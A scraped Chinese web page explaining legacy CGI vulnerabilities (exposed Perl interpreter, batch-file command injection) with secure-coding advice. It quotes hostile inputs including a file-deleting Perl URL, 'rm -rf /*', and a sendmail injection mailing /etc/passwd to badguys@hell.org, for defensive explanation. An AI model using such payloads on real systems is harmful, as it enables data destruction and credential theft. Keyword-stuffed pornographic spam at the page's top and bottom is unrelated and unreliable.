<em id="0a85b"><option id="0a85b"></option></em>

<abbr id="0a85b"></abbr>

      <nobr id="0a85b"></nobr>
        <tr id="0a85b"></tr>
        9久久伊人精品综合,亚洲一区精品视频在线,成 人免费va视频,国产一区二区三区黄网,99国产精品永久免费视频,亚洲毛片多多影院,精品久久久无码人妻中文字幕,无码国产欧美一区二区三区不卡
        學習啦 > 學習電腦 > 電腦安全 > 防火墻知識 > Web安全技術與防火墻

        Web安全技術與防火墻

        時間: 林澤1002 分享

        Web安全技術與防火墻

          計算機的安全性歷來都是人們討論的主要話題之一。而計算機安全 主要研 究的是計算機病毒的防治和系統的安全。下面是學習啦小編跟大家分享的是Web安全技術與防火墻,歡迎大家來閱讀學習。

          Web安全技術與防火墻

          步驟/方法

          Perl解釋器的漏洞

          Netscape Communications Server中無法識別cgi-bin下的擴展名 及其應 用關系,如:.pl是PERL的代碼程序自動調用 perl.exe文件解 釋,即使現在也只 能把perl.exe文件存放在cgi-bin目錄之下。執行 如: /cgi-bin/perl.exe?&my_script.pl. 但是這就給任何人都有執行 perl 的可能, 當有些人在其瀏覽器的URL中加上如: /cgi-bin/perl.exe?&-e+unlink+%3C*%3E 時,有可能造成刪除服務器當 前目錄下文件的危險。但是,其他如:O'Reilly WebSite或Purveyor都 不存在這種漏洞。

          〖2〗CGI執行批處理文件的漏洞

          文件名:test.bat:

          @echo off

          echo Content-type: text/plain

          echo

          echo Hello World!

          如果客戶瀏覽器的URL為:/cgi-bin/test.bat?&dir則執行調用命 令解釋 器完成dir列表。這給訪問者有執行其他命令可能性。

          2)O'Reilly WebSite server for Windows NT/95

          在WebSite1.1B以前的版本中使用配處理文件存在著Netscape同樣 的漏洞, 但是,新版關閉.bat在cgi中的作用。支持perl,VB和C作為CGI 開發工具。至于 他的安全問題參看: http://website.ora.com/devcomer/secalert1。

          3)Microsoft's IIS Web Server

          在96年3月5日前的IIS在NT下的.bat CGI的 bug甚至比其他更嚴 重,可以 任意使用command命令。但之后修補該漏洞。你可檢查你的可 執行文件的建立日 期。IIS3.0還存在一些安全bug,主要是cgi-bin下的 覆給權利。

          另外,許多 WEB服務器本身都存在一些安全上的漏洞,都是在版本 升級過 程不斷更新。在這就不一一列舉。

          從CGI編程角度考慮安全:

          1〕采用編譯語言比解釋語言會更安全些,并且 CGI程序應放在獨 立于HTML 存放目錄之外的CGI-BIN下,是為了防止一些非法訪問者從瀏覽 器端取得解釋性語 言的原代碼后從中尋找漏洞。

          2〕在用C來編寫CGI程序時盡量少用popen(), system()和所有涉 及/bin/sh 的shell命令。在Perl中system(), exec(), open(),eval() 等exec或eval之類命 令。在由用戶填寫的form還回cgi時,不要直接調 用system()之類函數。這是為避 免當填寫內容為“rm -rf /*”或 “/usr/lib/sendmail nobody@nowhere.com; mail badguys@hell.org< /etc/passwd”之類內容。

          3〕用Perl編寫CGI時如:

          $mail_to = &get_name_from_input;

          open (MAIL,"| /usr/lib/sendmail $mail_to");

          print MAIL "To: $mailto\nFrom: me\n\nHi there!\n";

          close MAIL;

          該小程序是把客戶瀏覽器的form到服務器的mail處理程序。

        Web安全技術與防火墻相關文章:

        1.為什么要使用web防火墻

        2.常用網絡安全技術有哪些

        3.web應用防火墻和傳統防火墻的區別

        4.web防火墻功能有哪些呢

        5.防火墻到底有沒有用

        6.WEB應用防火墻的相關介紹

        2822875 主站蜘蛛池模板: 国精品午夜福利视频不卡| 四虎影院176| 国产a网站| 国产精品一区在线蜜臀| 久久亚洲精品中文字幕波多野结衣| 午夜在线不卡精品国产| 亚洲色欲天天天堂色欲网| 2021国产精品一区二区在线 | 国产美女MM131爽爽爽| 好大好深好猛好爽视频免费| 国产成人亚洲老熟女精品| 欧美视频免费一区二区三区| 最近中文字幕完整版hd| 亚洲高清WWW色好看美女| 中国精学生妹品射精久久| 国产精品视频不卡一区二区| 成年无码av片在线蜜芽| 国精品无码一区二区三区在线看| 免费99精品国产人妻自在现线| 青青青草国产熟女大香蕉| 亚洲大老师中文字幕久热| 国产av无码专区亚洲aⅴ| 成人国产乱对白在线观看| 亚洲国产午夜精品福利| 久久婷婷五月综合鬼色 | 亚洲综合色婷婷中文字幕| 无码国内精品人妻少妇| 少妇夜夜春夜夜爽试看视频| 亚洲av乱码一区二区| 亚洲精品无码久久一线| 国产成人精品一区二区视频| 日韩高清福利视频在线观看| 亚洲狠狠婷婷综合久久久| 亚洲暴爽av天天爽日日碰| 国产精品久久中文字幕| 国产精品久久久亚洲456| 亚洲国产天堂久久综合网| 猫咪网网站免费观看| 一亚洲一区二区中文字幕| 伊人狠狠色丁香婷婷综合| 精品无码国模私拍视频|